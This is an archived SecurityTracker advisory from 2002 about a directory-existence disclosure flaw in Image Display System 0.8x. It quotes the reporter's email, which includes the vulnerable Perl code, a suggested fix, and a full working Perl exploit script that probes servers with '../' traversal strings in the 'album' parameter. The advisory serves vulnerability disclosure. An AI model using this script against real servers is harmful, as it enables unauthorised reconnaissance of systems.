SecurityTracker.com Archives - Image Display System (IDS) CGI Script Discloses Information About Existing Directories to Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Questions?

Want to learn about SecurityTracker? We've got answers to frequently asked questions right here

Category: Application (Generic) > Image Display System (IDS)

Vendors: ids.sourceforge.net

Image Display System (IDS) CGI Script Discloses Information About Existing Directories to Remote Users

SecurityTracker Alert ID: 1004396

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 29 2002

Impact: Disclosure of system information

Exploit Included: Yes

Version(s): 0.8x

Description: An information disclosure vulnerability was reported in the Image Display System (IDS) thumbnail gallery software. A remote user can determine if specified directories exist on the server.

A remote user can reportedly submit a URL request specifying any directory on the server via the 'album' variable to determine if the specified directory exists on the server. Apparently, any directory can be specified, but it must be specified using directory traversal strings ('../'). The flaw resides in the idsShared.pm::getAlbumToDisplay() function.

A demonstration exploit script is included in the Source Message.

According to the report, the same vulnerability also exists in the 'index.cgi' script.

Impact: A remote user can determine whether arbitrary directories exist on the server.

Solution: No solution was available at the time of this entry.

Vendor URL: ids.sourceforge.net/ (Links to External Site)

Cause: Access control error, Input validation error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: isox@chainsawbeer.com

Message History: None.

Source Message Contents

Date: 28 May 2002 20:21:20 -0000
From: isox@chainsawbeer.com
Subject: Information Disclosure Vulnerability in IDS 0.8x

 

Hello,

There is a information disclosure vulnerability in IDS 0.8x (assume other versions vulnerable).
IDS is used a cgi based image thumbnail gallery.  When an attacker sends the variable album 
a traversed directory (ie. /../../../../home/foobar) it is possible to tell if the specified 
directory exists by examining the returned error page.  This is possible do to the following 
snippit of code: 


idsShared.pm::getAlbumToDisplay()
=================================
    if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does t
his album exist?
		bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
    }
    
    if ($albumtodisplay =~ /\.\./) { # hax0r protection...
		bail ("Sorry, invalid directory name: $!");
    }



Attached below is a working exploit for this vulnerability.  The fix is simple, just flip the if 
statements around so it checks for ..'s first.  Also note there is the same type of information 
disclosure vulnerability in index.cgi via the following code (I have just not verified if it is 
exploitable, although is obviously seems as though it is):


index.cgi::processData()
========================
  	if ($mode eq 'image') {
	    getAlbumToDisplay();
		$imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!"
);
  		

  		unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
			bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!"
);
		}
	}
 
	if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
		bail ("Directory/image paths must not include \"../\".");
	}




Have a good one,
isox


<--- Begin Exploit Code --->

#!/usr/bin/perl -w
 
# ids-inform.pl (05/27/2002)
 
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
 
# By: isox [isox@chainsawbeer.com]
 
 
# usage: self explanitory
 
# my spelling: bad
 
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
 
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
 
 
#################
# Advertisement #
#################
 
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
 

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>
\n");
 

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
 

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
 

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
 


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }

  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
 

<-- EOF -->

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC